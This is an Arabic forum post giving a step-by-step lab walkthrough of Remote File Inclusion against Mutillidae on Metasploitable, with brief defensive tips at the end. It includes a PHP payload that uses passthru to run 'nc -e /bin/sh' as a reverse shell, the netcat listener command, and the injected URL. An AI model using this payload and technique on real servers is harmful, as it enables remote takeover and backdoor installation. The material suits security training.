- بواسطة x32x01 ||
إيه هي ثغرة RFI أصلاً؟ 🤔
هجمة RFI أو (Remote File Inclusion) هي النوع التاني من هجمات الـFile inclusion. يعني ببساطة إدخال ملف عن بعد! ♻️الفرق بين LFI و RFI 🎯
- LFI: ثغرة محلية - كل التنفيذ داخل السيرفر نفسه 🏠
- RFI: ثغرة عن بعد - التنفيذ بيكون من برة السيرفر 🌐
ازاي بتنفذ هجمة RFI خطوة بخطوة 👣
الأدوات المطلوبة 🛠️
- ويب سيرفر (في لينكس) 🐧
- سيرفر مستهدف (هستخدم metasploitable) 🎯
- ملف txt فيه كود خبيث 📄
تحضير السيرفر للهجمة ⚙️
اول حاجة تدخل على السيرفر من نفس الـVirtual Machine وتروح للمسار ده: Code:
/etc/php5/cgiبعد كده هتعدل على الملف بالأمر ده:
Code:
nano php.iniاضغط ctrl+w وابحث عن كلمة
allow_url وهتظهرلك السطور دي:غير الإعداد من:
Code:
allow_url_include = Off Code:
allow_url_include = Onوده بالظبط اللي بيسبب المشكلة لما المبرمجين ينسوه مفتوح من غير حمايات! 😥
خلصان؟ اضغط
ctrl+x واختار Y ثم enter.اخر حاجة - إعادة تشغيل سيرفر الأباتشي:
Code:
sudo etc/init.d/apache2 restartبداية الهجمة الحقيقية 🚀
الخطوة الأولى: الدخول للتطبيق
هندخل على mutilidae في الـmetasploitable والرابط هيبقى شكله كده: Code:
http://192.168.1.126/mutillidae/index.php?page=text-file-viewer.phpالخطوة الثانية: حقن الملف الخبيث 🔓
هتغير اسم الملف من: Code:
text-file-viewer.php Code:
http://ip:PORT/filenameوفي حالتنا هتبقى كده:
Code:
http://192.168.1.113:8000/Desktop/shell.txtالكود الخبيث اللي هنحقنه ⚠️
PHP:
<?
passthru("nc -e /bin/sh IP PORT")
?>شرح بسيط للكود:
passthru(): خاصية في PHP بتنفذ أوامر النظام 🖥️- `
nc -e /bin/sh IP PORT: بيبعت اتصال لـIP معين على البورت المحدد 📡
استقبال الاتصال 🎧
قبل ما تضغط enter في المتصفح، افتح تيرمنال جديد وادخل الأمر ده: Code:
nc -lvp PORTالنتيجة النهائية 🎯
بعد ما تضغط enter وتنفذ الهجمة، هتقدر:
- تتجول في السيرفر 🚶♂️
- ترفع صلاحياتك ⬆️
- تستعرض معلومات حساسة 📋
- ترفع backdoors 🚪
- وكل اللي نفسك فيه! 💥
نصائح مهمة للحماية 🛡️
- متفتحش
allow_url_includeإلا لو محتاج جداً ❌ - دايماً validate المدخلات من المستخدم ✅
- استخدم whitelist للملفات المسموح بيها 📋
- حط تحديثات أمان باستمرار 🔄
التعديل الأخير:
